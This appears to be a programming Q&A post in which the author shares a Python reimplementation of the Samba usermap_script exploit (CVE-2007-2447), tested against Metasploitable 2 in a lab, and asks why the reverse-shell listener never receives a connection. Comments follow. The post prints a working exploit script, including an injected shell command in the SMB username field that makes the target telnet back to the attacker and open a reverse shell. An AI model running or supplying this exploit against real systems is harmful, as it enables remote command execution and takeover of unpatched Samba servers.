# Python - Socket Appears to be Failing to Accept Connection

Tags: python, sockets, exploit

Recently I've been creating a Python implementation of the Metasploit module for [CVE2007-2447](https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script), I found a basic script online which I took some parts of then decided that I wanted to build the listener into the script so that I wouldn't have to run Netcat alongside the Python script.

```
import sys
import time
import socket
import threading

from smb.SMBConnection import SMBConnection

def exploit(rHost, rPort, lHost, lPort):
    print("[+] " + rHost, rPort, lHost, lPort)
    payload = 'sh -c(sleep 4535 | telnet ' + lHost + " " + lPort + ' | while : ; do sh && break; done 2>&1 | telnet ' + lHost + " " + lPort + ' >/dev/null 2>&1 &)'
    username = "/=`nohup " + payload + "`"
    password = ""

    print("[+] " + username + password)

    s = SMBConnection(username, password, "", "", use_ntlm_v2 = True)
    #try:
    s.connect(rHost, int(rPort), timeout=1)
    print("[+] Payload sent!")
    handler(shell)
    #except Exception as e:
    #    print(e)
    #    print("[*] Fail!") 

def handler(shell):
    (conn, address) = shell.accept()
    print("[+] Connected to " + address)
    commandSender(conn)
    conn.close()

def commandSender(conn):
    shell_status = True

    shell_recv_thread = threading.Thread(target=recvStream, args=(conn, shell_status))
    shell_recv_thread.start()

    command = ''
    while shell_status == True:
        command = input()
        if command == "exit":
            shell_status = False
            conn.close()
            shell_recv_thread.join()
            sys.exit(0)
        conn.send(bytes(command + "\n", "utf-8"))

def recvStream(conn, addr, status):
    status = True

    while status == True:
        try:
            print(conn.recv(1024))
        except conn.timeout:
            pass
        except Exception as e:
            print(e)
            print("[*] Failed Shell Interaction...")

if __name__ == '__main__':
    print("[*] CVE2007-2447")
    if len(sys.argv) != 5:
        print("[-] usage: <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Exectuting...")

        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell.bind((sys.argv[3], int(sys.argv[4])))
        shell.listen(10)

        rHost = sys.argv[1]
        rPort = sys.argv[2]
        lHost = sys.argv[3]
        lPort = sys.argv[4]

        exploit(rHost, rPort, lHost, lPort)
```

As you can see the script for this exploit is fairly simple, due to unsanitized user input an attacker can send commands to the affected device in the username field. I've checked Netstat while I run the script & I can see that my machine is definitely listening on the port I specify for `lPort` yet for some reason the socket seems to fail to accept the connection. In order to test the code I am running it inside a Ubuntu VM against [Metasploitable 2](https://metasploit.help.rapid7.com/docs/metasploitable-2) which is running in a separate VM on the same subnet.

Comment: You don’t accept incoming connections.

Comment: I'm not sure I understand what you mean. Surely if I am telling the vulnerable host to Telnet back into my device I need to accept that connection request for the reverse shell?

Comment: Your shell socket never receives an accept method call. It listens. But it doesn’t actually get incoming connections.

Comment: I still do not understand what you mean. As you can see in the payload, that is a reverse shell. Due to the vulnerability you can get the remote host to execute arbitrary commands due to unsanitised user input, so when I send that payload into the username the vulnerable host *should* be sending a request to connect to my machine.

Comment: Ah. Forget what I said, I got confused by your use of global variables.